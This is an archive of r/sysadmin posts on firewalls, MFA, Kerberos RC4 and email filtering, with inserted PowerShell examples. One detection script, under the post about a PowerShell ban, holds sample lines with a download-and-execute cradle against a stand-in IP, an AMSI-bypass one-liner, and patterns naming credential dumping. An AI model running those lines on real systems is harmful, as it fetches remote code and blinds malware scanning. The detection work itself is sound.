Sysadmin


A reddit dedicated to the profession of Computer System Administration.

1
This is an automated archive.

The original was posted on /r/sysadmin by /u/CertainlyBright on 2023-10-24 21:29:41+00:00.


Going to be buying a PA-1410 and wanted to know what kind of switches do you normally buy with that caliber of firewall?

2

The original was posted on /r/sysadmin by /u/drmonix on 2023-10-24 21:22:42+00:00.


I'm a Linux admin and a team of one, training a new hire with 20 years of experience, mostly in DevOps and AWS. I have about 9. There are other Linux admins from other teams I work closely with, but for the most part, myself and this new hire are responsible for about 600 servers, mostly on-prem and about 1/6 AWS.

Developer reaches out today and wants a web instance accessible off VPN so the client can look at it. I've only been here a year and this is a new one for me, so I go take a look, find the correct security group in about 2 minutes, and decide to offload this to the new hire because PM wants new hire to start getting environment exposure.

I give new hire the task in a group chat with the developer. The new hire asks the developer what the security group and instance are. I reiterate the instance name and tell him the developer doesn't know what security group is needed, to go check and figure it out.

New hire is quiet for about 3 minutes, then asks me to call him. I ask why. He needs help. We screenshare and he pulls up the security groups, but is unable to identify which one. I ask him what he would do if the task were assigned to him and I wasn't here. He says he sees two security groups that seem to allow public internet access but isn't sure which one to use. I ask him what is the best way to decide between the two and he is unsure. I show him that one of the groups isn't actually public internet access and is another group of VPN addresses, and the other group has the rules to allow access from everywhere. He applies it and states that "applying security groups is dangerous and he just wanted a second set of eyes."

This was the situation from today, but this situation has been ongoing. Every task I assign, he troubleshoots for about 2 minutes and then wants the answer handed to him. My PM told me to document these instances, but I feel like I am essentially training someone with double my experience. He obviously knows some of what he is doing, but he is basically nonfunctional without a clearly outlined document giving him a step-by-step instruction on what needs to be done. Our environment isn't well documented for sure, but most of the tasks he seems to have questions on are problems I had to solve myself as a new employee and I did it with relative ease with far less experience.

How do I deal with this guy and stop myself from going insane?
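
The decision the post describes, telling a group whose rules are limited to VPN address ranges apart from one open to the world, is the kind of check worth scripting rather than eyeballing in the console. The block below is an added example, not the poster's code or environment. The two security groups are constructed, and the trusted CIDRs are assumed values; the objects mirror the IpPermissions / Ipv4Ranges / CidrIp shape that Get-EC2SecurityGroup from the AWS Tools for PowerShell returns, so the same function runs against live output.

```powershell
# Added example (not from the original post). Classifies security groups by
# whether any ingress rule is open to the world, so "which of these two is
# really public?" is answered by a function instead of by inspection.

# Ranges treated as "inside" (VPN pool, office egress). Assumed values; exact
# CIDR string match only, no subnet containment.
$TrustedCidrs = @('10.8.0.0/16', '203.0.113.0/24')

function Test-PublicSecurityGroup {
    param([Parameter(ValueFromPipeline)] $Group)
    process {
        $world = @(); $trusted = @(); $other = @()
        foreach ($perm in $Group.IpPermissions) {
            # IpProtocol '-1' means all protocols/ports
            $port = "$($perm.FromPort)-$($perm.ToPort)/$($perm.IpProtocol)"
            if ($perm.IpProtocol -eq '-1') { $port = 'all' }
            elseif ($perm.FromPort -eq $perm.ToPort) { $port = "$($perm.FromPort)/$($perm.IpProtocol)" }

            foreach ($r in $perm.Ipv4Ranges) {
                $entry = "$($r.CidrIp) -> $port"
                if ($r.CidrIp -eq '0.0.0.0/0')             { $world   += $entry }
                elseif ($TrustedCidrs -contains $r.CidrIp) { $trusted += $entry }
                else                                       { $other   += $entry }
            }
            foreach ($r in $perm.Ipv6Ranges) {
                if ($r.CidrIpv6 -eq '::/0') { $world += "::/0 -> $port" }
            }
        }
        $verdict = 'VPN/trusted only'
        if ($world)      { $verdict = 'PUBLIC' }
        elseif ($other)  { $verdict = 'RESTRICTED (review)' }
        [pscustomobject]@{
            GroupId   = $Group.GroupId
            GroupName = $Group.GroupName
            Verdict   = $verdict
            World     = $world -join '; '
            Trusted   = $trusted -join '; '
            Other     = $other -join '; '
        }
    }
}

# Constructed groups: one holds the VPN pool (looks "public" at a glance),
# the other is open to all on 443 and 22.
$groups = @(
    [pscustomobject]@{
        GroupId = 'sg-0aaa'; GroupName = 'web-vpn-only'
        IpPermissions = @(
            [pscustomobject]@{ IpProtocol = 'tcp'; FromPort = 443; ToPort = 443
                               Ipv4Ranges = @([pscustomobject]@{ CidrIp = '10.8.0.0/16' }, [pscustomobject]@{ CidrIp = '203.0.113.0/24' })
                               Ipv6Ranges = @() }
        )
    }
    [pscustomobject]@{
        GroupId = 'sg-0bbb'; GroupName = 'web-public'
        IpPermissions = @(
            [pscustomobject]@{ IpProtocol = 'tcp'; FromPort = 443; ToPort = 443
                               Ipv4Ranges = @([pscustomobject]@{ CidrIp = '0.0.0.0/0' })
                               Ipv6Ranges = @([pscustomobject]@{ CidrIpv6 = '::/0' }) }
            [pscustomobject]@{ IpProtocol = 'tcp'; FromPort = 22; ToPort = 22
                               Ipv4Ranges = @([pscustomobject]@{ CidrIp = '0.0.0.0/0' })
                               Ipv6Ranges = @() }
        )
    }
)
$groups | Test-PublicSecurityGroup | Format-List

# Live, in an account with the AWS Tools installed (assumed region):
# Get-EC2SecurityGroup -Region us-east-1 | Test-PublicSecurityGroup | Where-Object Verdict -eq 'PUBLIC'
```

The second group is the one that actually exposes the instance; the first only admits the VPN and office ranges. An unexpected entry such as 0.0.0.0/0 on port 22 shows up in the World column and is the thing to question before attaching the group.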

3

The original was posted on /r/sysadmin by /u/hiddenbutts on 2023-10-24 20:56:41+00:00.


In light of a recent "rant" of questionable truthfulness, it may be time for a discussion on what options we have as sysadmins and why employees don't want to connect personal devices to the company.

This is not a discussion about if MFA should be used or not, it's a discussion about what options are currently available that would satisfy the company's requirement for MFA/security and the employees right to privacy. Looking through the archive, there is nothing recent on this.

Installing an MFA token is not "just an application". It is putting company data on an employee owned device, and the terms of service can change at any time. There are ways you can limit exposure, but in the end, it is making that personal device part of the company assets from a legal point of view.

There are many aspects to this, the biggest of which is legal in nature. Link below is a fantastic overview of the legal landscape involving BYOD and corporate legal issues.

Another aspect to acknowledge is the difference between required and optional. If an employee can opt in to having email/company data on the phone so it is more convenient for them to work, that is very different from being required to have something on a personal phone to do their job.

There will be people you will run into in your career that have a hard no on mixing personal and work, and that should be respected. Firing someone because they refuse to put work information on a personal device will get you in legal trouble.

So what solutions do you have? Do you have a budget for company cell phones? Do you have yubikeys or similar token generators? Do you have a soft token that is accessible after login to windows? Maybe some other solution?

(not a lawyer, but have been around quite a few blocks and seen some shit. also read the ToS on many of these apps, and they can get updated anytime)

4

The original was posted on /r/sysadmin by /u/redditor100k on 2023-10-24 20:48:16+00:00.


I was trying to save some money by buying an Intel 14700K, but it has 8 performance cores and 12 eco cores and Microsoft's licensing seems confusing. Are they really going to charge me for the eco cores, since I have 20 and the pricing is like 16 or something? I'm pretty confused. It's just me and like 2-3 other people who are going to be remote desktopping into this thing, so can I just use the "Essentials" version and be done with it? I'm guessing they're not expecting people to use non-Xeon CPUs.

5

The original was posted on /r/sysadmin by /u/Hollowpoint357 on 2023-10-24 20:26:51+00:00.


Can you assign an IP for a collection? I thought maybe I'd be able to use a PTR to point at the hostname for a farm, but it was too good to be true. Is this easily doable?

6

The original was posted on /r/sysadmin by /u/mustang__1 on 2023-10-24 20:00:23+00:00.


Is it possible to configure AOVPN with just a WatchGuard VPN server? I don't (presently) have enough licenses to allocate a dedicated Windows VPN server. I already have my WatchGuards running as VPN servers; can I just use them? Or maybe AOVPN to an Azure gateway that gets piped to HQ? That seems like it would be hideously slow, though...

7

The original was posted on /r/sysadmin by /u/Seatpan on 2023-10-24 19:37:44+00:00.


While attempting to move from Atlassian Confluence to another tool, we see that there are many features/widgets and other items that don't export properly or at all. With thousands of pages across multiple teams we have only scratched the surface in finding issues. I was wondering if anyone has already gone through this process and has a list of known problems I could add to my list. I'm trying to figure out if we can search the db/html for things that might break. Thanks.

If I should post this question elsewhere, please let me know.

8

The original was posted on /r/sysadmin by /u/fullMetalFileCabinet on 2023-10-24 19:26:24+00:00.


Think we are getting close to disabling RC4 for Kerberos. A 30 day audit of 4768 and 4769 events shows the following:

AES256-CTS-HMAC-SHA1-96 15,043,147

RC4-HMAC 42

My plan is to define "Network security: Configure encryption types allowed for Kerberos" in group policy objects that apply to both domain controllers and member servers. Only the following will be checked:

AES128_HMAC_SHA1

AES256_HMAC_SHA1

Future encryption types

My question: after doing this, do I still need to identify all accounts that have an SPN defined and check the AES boxes in the account's properties? Does this need to be done on the KRBTGT account as well?

Thanks!
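
The two halves of that question are separate mechanisms, and the script below (an added example, not the poster's audit) keeps them apart. The GPO only governs what the computers it applies to will offer and accept; the KDC chooses a service ticket's cipher from the target account's keys and its msDS-SupportedEncryptionTypes attribute, so a user or service account with an SPN and an unset (0) attribute still yields RC4 service tickets after the GPO lands. Two caveats the inventory does not see: an account has AES keys only if its password was set on a 2008-or-later DC, so long-lived service passwords may need a change; and krbtgt's attribute is not consulted, TGTs are AES-encrypted once the domain functional level is 2008 or higher. It assumes RSAT/ActiveDirectory is present and that it runs against each DC's own Security log, since 4768/4769 are logged per DC and the 30-day window is the poster's.

```powershell
# Added example (not from the original post). Two checks before disabling RC4:
#   1) who is still getting RC4 tickets (4768/4769 with TicketEncryptionType 0x17)
#   2) which SPN-bearing accounts do not advertise AES in msDS-SupportedEncryptionTypes
# Assumes: run on a domain controller (or against each DC in turn) with rights to
# read the Security log, and the ActiveDirectory module installed.

# msDS-SupportedEncryptionTypes bit values (documented by Microsoft)
$AES128 = 0x08
$AES256 = 0x10
$RC4    = 0x04

# 4768/4769 TicketEncryptionType values: 0x17 = RC4-HMAC, 0x12 = AES256, 0x11 = AES128
$Rc4TicketType = '0x17'

# 1) Ticket requests in the audit window that were answered with RC4.
$since = (Get-Date).AddDays(-30)
$rc4Events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768, 4769; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Id      = $_.Id
            Time    = $_.TimeCreated
            Account = $d['TargetUserName']   # requesting principal
            Service = $d['ServiceName']      # krbtgt for 4768, the SPN's account for 4769
            Client  = $d['IpAddress']
            EncType = $d['TicketEncryptionType']
        }
    } | Where-Object EncType -eq $Rc4TicketType

"RC4 tickets by service and requester:"
$rc4Events | Group-Object Service, Account | Sort-Object Count -Descending | Format-Table Count, Name -AutoSize

# 2) Accounts with an SPN whose attribute does not include an AES bit.
#    Unset/0 means the KDC has no AES flag for the account; such user and
#    service accounts keep receiving RC4 service tickets regardless of the GPO.
"SPN accounts without AES advertised:"
Get-ADObject -LDAPFilter '(servicePrincipalName=*)' -Properties msDS-SupportedEncryptionTypes, servicePrincipalName |
    ForEach-Object {
        $v = [int]($_.'msDS-SupportedEncryptionTypes')   # $null becomes 0
        [pscustomobject]@{
            Name   = $_.Name
            Class  = $_.ObjectClass
            Value  = ('0x{0:x}' -f $v)
            HasAES = [bool]($v -band ($AES128 -bor $AES256))
            HasRC4 = [bool]($v -band $RC4)
            Unset  = ($v -eq 0)
        }
    } | Where-Object { -not $_.HasAES } | Format-Table Name, Class, Value, HasRC4, Unset -AutoSize
```

Run the first half on every DC (or forward the Security log to a collector first) so the 42 RC4 requests resolve to specific services and clients; the second half lists exactly the accounts whose "AES" checkboxes still need setting, which is the inventory the post asks about.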

9

The original was posted on /r/sysadmin by /u/samfisher850 on 2023-10-24 18:34:11+00:00.


I started work at a relatively small but quickly growing company (currently around 200 employees but could probably pass 300 within a couple of years) where before me there wasn't really any IT department and software was fully managed by whoever purchased it. As some examples, HR owned/managed Google Workspace, our QA lead owns Jira, and marketing owns Adobe CC.

My question is, to what degree should I take ownership of applications as the sysadmin/IT?

My thoughts are

Google Workspace is obvious, I'll take 100% control of that from billing to user accounts.

Jira which is mostly company wide, maybe have an admin account just for deactivating accounts when people leave but let someone else manage the software itself.

Adobe which is mostly used in one department, potentially let them manage everything.

At our size most anything would work decently well, but how should I position everything to accommodate growth to a medium size company?

Edit: formatting

Edit2: more specific company size

10

The original was posted on /r/sysadmin by /u/Cody9412 on 2023-10-24 18:17:39+00:00.


Anybody else seeing AT&T issues in the southeast/Florida? It started with ScreenConnect this morning. They say the issue is resolved, but I'm still not getting anywhere with it here and I'm seeing reports of routing problems in Florida.

11

The original was posted on /r/sysadmin by /u/Anxious_Neck7436 on 2023-10-24 16:38:57+00:00.


I started working in an organization this year. It felt like a new experience to work there, as I hadn't worked in a small-team environment at a workplace before. There were 3-4 seniors in the team, and they micromanaged the other members. From the start, the environment was such that if anyone made a mistake, it was reported to the most senior member. The most senior member scolded me once in public while coming into the office and always threatened to move me to sysadmin. And finally, he did just that. The work in system admin is basically helpdesk and is not adding anything further to my skillset. I just concentrate on day-to-day work and leave on time. I am already in the process of upskilling for a DevOps profile. Should I leave and upskill full-time if I have an emergency fund and am confident about landing a new job in the same city?

12

The original was posted on /r/sysadmin by /u/keitheii on 2023-10-24 16:14:37+00:00.


We have multiple buildings around the country, each with multiple carriers, and are seeing heavy latency and packet loss when trying to reach certain endpoints; it seems pretty random.

A tracert shows problems in the middle of the route, and even though that hop is within our ISP's infrastructure (AT&T), they refuse to escalate any tickets as our circuits test fine, which they are... the issue isn't our circuits, it's the path our traffic is traversing, only for certain endpoints. Unfortunately some of our P2P tunnel endpoints are traversing these troublesome paths.

I haven't seen any talk of this here today, is anyone else experiencing this?

13

The original was posted on /r/sysadmin by /u/Max_Xevious on 2023-10-24 15:09:24+00:00.


I really have no idea how I can tell Microsoft any more that emails coming from specific addresses are NOT PHISHING EMAILS!

We use a 3rd party email filtering service and I would honestly prefer to completely disable the anti-phishing through M365 and let our 3rd party handle all of that, but there doesn't seem to be a way I can do that.

I have a domain from which we receive two different emails in the middle of the night, sent to everyone in our office. It's very important info that people need at the very start of the business day. These are two specific email addresses and the domain is the same.

I've gone through and set rules in the EAC to set the SCL to -1 if the email sender matches either of the two email addresses, but they are still getting flagged as phishing and quarantined.

I've also reported the messages to Microsoft as a false flag but I really have no hope that will help with anything.

The emails in question do have a PDF attachment, but no links or anything in the body of the email.

I am at the end of my rope on this one, I am not sure if there is somewhere else I can set these email addresses to be ignored or if Microsoft just does not care that I whitelisted the email addresses, and even the domain.

14

The original was posted on /r/sysadmin by /u/Available_Printer on 2023-10-24 16:25:43+00:00.


I’m not asking for help but I wanted to post something because I could not find a single person who had this issue with Sage 2023.

Symptoms: when some databases are opened in Sage, black bars appear over interactable objects like text fields and drop-down menus. It's more annoying for drop-down lists because each item in the list shows black and you must mouse over each item before it becomes visible. This does not happen in a full-session RDP, only RemoteApp.

Last year at the end of August there was a Windows patch applied to an AVD server that users log in to for Sage. I won't get into the specific details because it's a really long issue.

We contacted MS, who blamed Sage, saying it could not be an OS or Azure issue, and likewise Sage blamed MS. This was after exhausting troubleshooting with both vendors.

Today I set up a new AVD (built using the enterprise virtual desktop with Office baked in) and tested with the end user. We have not been able to recreate the issue.

15

The original was posted on /r/sysadmin by /u/jimboslice_007 on 2023-10-24 15:39:04+00:00.


Small company, currently using Google Workspace (I know, I know). Looking to add another remote office. The existing remote offices are set up as site-to-site VPNs, running Hyper-V, with a DC and an application server. Ideally, the new office isn't going to need the application server, so it feels like a physical server just for a DC is unnecessary.

What have you guys done for this sort of setup? Get a server anyway? Do some cloud-hosted AD solution (DC hosted in AWS)? Just use the DC from the main office over VPN?? Seems like there is always something new every couple of years and I'm not as current on this stuff as I should be. And as always, there is pressure to keep the cost down.

16

The original was posted on /r/sysadmin by /u/Confident-Shirt-8467 on 2023-10-24 15:38:26+00:00.


I work in a large corporation. We have around 10 people in our helpdesk 24/7. I find myself constantly getting tickets that are shoved up to Infrastructure for things as simple as “application won’t install, Troubleshooting done: Reboot didn’t fix, assigning to infrastructure for help.”

It’s practically yeeting tickets over because they don’t want to troubleshoot. Just was curious if this is now the standard?

Possibly looking for advice on how to give them more motivation to problem solve? (We pay our helpdesk people nearly $15k above the standard wages for our state)

17

The original was posted on /r/sysadmin by /u/slewis_1972 on 2023-10-24 15:34:01+00:00.


Ok, seeking sanity and why.

Going through a huge transformation. We have 2500 employees that only access their personal records/HR/training via a specific online system and don't need email. MFA is being turned on by the new vendor - fine by me (I have requested it), especially as some of those users are other users' managers and have access to multiple accounts in this system. Note, we have scope to go to 4500+ employees in the next 2 years.

We are in the UK. So, my question is: SMS for MFA (but I am querying whether they are going to do what MS plan to and make it not the primary method unless you override), but also the relevant app from the supplier if they wish to install it on a phone.

Now, pushback from staff on using their own devices for MFA. My head is telling me the cheapest option is then to use an OATH hardware token, £10 a user if that. Or has anyone seen it enforced in a user's contract to use their own device?

Update: sanity check over, thanks. If they don't agree that the simplest solution for them is to use their own device, OATH hardware tokens it is...

18

The original was posted on /r/sysadmin by /u/ScuzzyUltrawide on 2023-10-24 15:27:30+00:00.


I haven't done this kind of work in a long time, but back in the day I had utilities to do this. Today I would have to look up a bunch of individual utilities to do things like dump out the active process list, drive list with capacity and usage, installed apps according to os level utilities. It had a piece for windows and for linux and would dump out big text files that we used for getting the post-migration systems back up and running correctly. I'm being pulled in because I'm a developer in a legacy language and someone quit and I stepped up, but now I kind of wish I had my old tools like from the Win2000 era. Now I have a list of about 15 legacy windows and linux servers I need to get my arms around. Anyone have a couple links to help me out? I'm at a loss for search terms. What is that class of software even called now?

19

The original was posted on /r/sysadmin by /u/rmeman on 2023-10-24 15:23:53+00:00.


Hello,

Anyone else aware of network issues from NA to South/Central America? We're getting reports from all over the place: Brazil, Peru, Colombia, Chile, Costa Rica, etc.

20

The original was posted on /r/sysadmin by /u/TechnicallyBasedCat on 2023-10-24 15:15:25+00:00.


Hey everyone!

I have a really strange issue that I have been struggling to find a root cause for, and I was wondering if anyone else here has run into something similar or has some advice on what I could check/try next.

Problem: Several users in a small office work out of a single network share, primarily on Word (docx) documents. In the last couple of weeks, they noticed that every ~10-15 documents, they interact with one that has this strange behavior when trying to save it. Basically, when you hit the save icon, Word acts like it saves the document with no errors, nothing. But the file never gets updated in the file share.

Some other points to note:

  • The documents were all created by these employees and not generated by any system or online tool.
  • If you do a "save as" on the problem documents and create a new copy, the issue does not follow to the new document.
  • If another user tries to open and save the problem document, they will have the same issue.
  • All of the documents are in the same format (docx).
  • There is nothing visibly special about these documents: no pictures, no hyperlinks, just straight text.
  • All of them are running Office 2309 Build 16827.20130 - Current Channel.
  • We have tried running a full online repair of Office.
  • The behavior is the same whether or not the user has multiple documents open at the same time or just the problem document.
  • Documents that were previously causing an issue seemingly no longer have the issue after a couple of days.
  • Saving the document locally works without issue.
  • OneDrive is enabled and syncing OK, but they do not use the "Auto Save" feature as these files are on a network share.
  • We are running ESET and Huntress on their workstations and file server and neither have any related alerts or log entries.

This is the first time I have seen anything like this. Very strange behavior from Word.

Would appreciate any advice you can pass along for what to try next.

Thanks!

21

The original was posted on /r/sysadmin by /u/shalnark90 on 2023-10-24 15:09:02+00:00.


I work in an organization that disabled PowerShell for everyone, even admins. The security team mentioned that it's due to "PowerShell being a security issue". It's extremely hard doing the job without PowerShell. I'm trying to convince them that this isn't the way, but they keep insisting that every other organization does the same thing. What do y'all think?
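
The control most shops use instead of removing the shell is to keep it, log every script block that runs (event 4104 in the Microsoft-Windows-PowerShell/Operational log, plus transcription), restrict unsigned code with Constrained Language Mode via AppLocker or WDAC, and hunt over the log. The block below is an added example and not the poster's organization's configuration. The registry values it sets are Microsoft's documented policy keys for script block logging and transcription; the transcript path is assumed; the three 4104 records are constructed samples so the detection runs offline, and the commented Get-WinEvent line is how it reads a real log.

```powershell
# Added example (not from the original post). Turn on PowerShell logging and
# flag the script-block patterns that make PowerShell "a security issue" in the
# first place, so the team can see them instead of blocking the tool.

# Documented policy keys. Transcript directory is an assumed value.
$policy = @{
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' = @{ EnableScriptBlockLogging = 1 }
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'      = @{ EnableTranscripting = 1; OutputDirectory = 'C:\PSTranscripts' }
}
function Enable-PowerShellLogging {
    foreach ($path in $policy.Keys) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        foreach ($name in $policy[$path].Keys) {
            Set-ItemProperty -Path $path -Name $name -Value $policy[$path][$name]
        }
    }
}

# Patterns worth a second look in 4104 ScriptBlockText. Case-insensitive, not exhaustive.
$Indicators = [ordered]@{
    EncodedCommand   = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'
    DownloadCradle   = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer'
    InvokeExpression = '\b(Invoke-Expression|IEX)\b'
    Reflection       = '\[System\.Reflection\.Assembly\]::Load|VirtualAlloc|GetDelegateForFunctionPointer'
    AmsiTamper       = 'AmsiUtils|amsiInitFailed|AmsiScanBuffer'
    CredentialAccess = '\blsass\b|MiniDump|sekurlsa|Invoke-Mimikatz'
    StealthFlags     = '-w(indowstyle)?\s+hidden|-nop\b|-noni\b'
}

function Find-SuspiciousScriptBlock {
    param([Parameter(ValueFromPipeline)] [pscustomobject] $Record)
    process {
        $hits = foreach ($k in $Indicators.Keys) {
            if ($Record.ScriptBlockText -imatch $Indicators[$k]) { $k }
        }
        if ($hits) {
            [pscustomobject]@{
                Time       = $Record.TimeCreated
                Computer   = $Record.Computer
                Indicators = ($hits -join ',')
                Snippet    = $Record.ScriptBlockText.Substring(0, [Math]::Min(80, $Record.ScriptBlockText.Length))
            }
        }
    }
}

# Constructed sample records shaped like 4104 events (benign admin task, download
# cradle, AMSI bypass). The IP and host names are made up.
$samples = @(
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'ws01'; ScriptBlockText = 'Get-ADUser -Filter * | Export-Csv users.csv' }
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'ws02'; ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")' }
    [pscustomobject]@{ TimeCreated = Get-Date; Computer = 'ws03'; ScriptBlockText = '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)' }
)
$samples | Find-SuspiciousScriptBlock | Format-Table -AutoSize

# Against the real log on a host where logging is on (Properties[2] is ScriptBlockText):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; Computer = $_.MachineName; ScriptBlockText = $_.Properties[2].Value } } |
#     Find-SuspiciousScriptBlock
```

The first sample produces no row; the second is flagged as DownloadCradle and InvokeExpression, the third as AmsiTamper. Script block logging records the de-obfuscated text of what actually executed, which is the visibility a blanket ban gives up, since an attacker who lands on the box can still run System.Management.Automation from their own host process regardless of whether powershell.exe is blocked.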

22

The original was posted on /r/sysadmin by /u/imrik_of_caledor on 2023-10-24 15:01:20+00:00.


Rational or not, what products, brands, etc. do you just dislike or not trust?

Mine is Dell VxRail - we had one at my last place and spent a lot of money on consultancy (our CTO evidently had a golf buddy at the consultancy place) and professional services getting it in.

The thing itself was fine but we were not fans of the vSAN - we did some resiliency tests one weekend in our datacentre before it went live and had to power everything off...the vSAN practically shat itself, to the point where we were very sceptical of the resiliency it offered vs a traditional SAN.

23

The original was posted on /r/sysadmin by /u/dogcmp6 on 2023-10-24 14:41:10+00:00.


I have been having issues with HP Managed Print services sending out supply requests in a timely manner. I have 4 supply requests open for a month, and the ink was never shipped, I had the same issue with another printer last month, and it sounds like other buildings within my org have been having similar issues...Was curious if any other Sysadmins are running into this issue? HP support reps keep running us in circles...It's somehow worse than talking to Comcast.

24

The original was posted on /r/sysadmin by /u/PowerShellGenius on 2023-10-24 14:25:00+00:00.


I'm seeing a Google Workspace for Education Fundamentals tenant that isn't letting newly created users into their accounts without adding and verifying a phone number. 2-step verification is not enforced in the tenant.

Obviously, it's not a foregone conclusion in K12 that all users even own a cell phone yet. I'm assuming there is a way to shut this off entirely, but I'm not seeing it.

25

The original was posted on /r/sysadmin by /u/TypaLika on 2023-10-24 14:09:33+00:00.


Currently going through an internal audit for security in preparation for a common certification. We have provided the internal auditor with the CUECs for our SaaS subscriptions, and they are following up for items related to products we don't subscribe to. When I try to explain this, I get lectures about never telling an auditor no followed by long-winded diatribes about how important this process is.

If I have a documented vehicle maintenance schedule and I use a fleet maintenance manual from the manufacturer as guidance, I'm not going to maintain schedules, perform tasks, and have documented procedures for models that are in the manufacturer's manual but not in my fleet. I'm absolutely certain I'm right, and I'm not going to back down and write procedures for SaaS applications we don't subscribe to, because if I do I'll pay for that acquiescence multiple times a year in multiple inane and frustrating pointless audits. To be clear, I'm not saying audits are pointless, but audits for maintenance and security of cloud applications we don't have subscriptions for are pointless.

Is there a better analogy than my car analogy? Is there some defense for this inanity? Am I missing something, or do I just need a lobotomy to stay in this field?
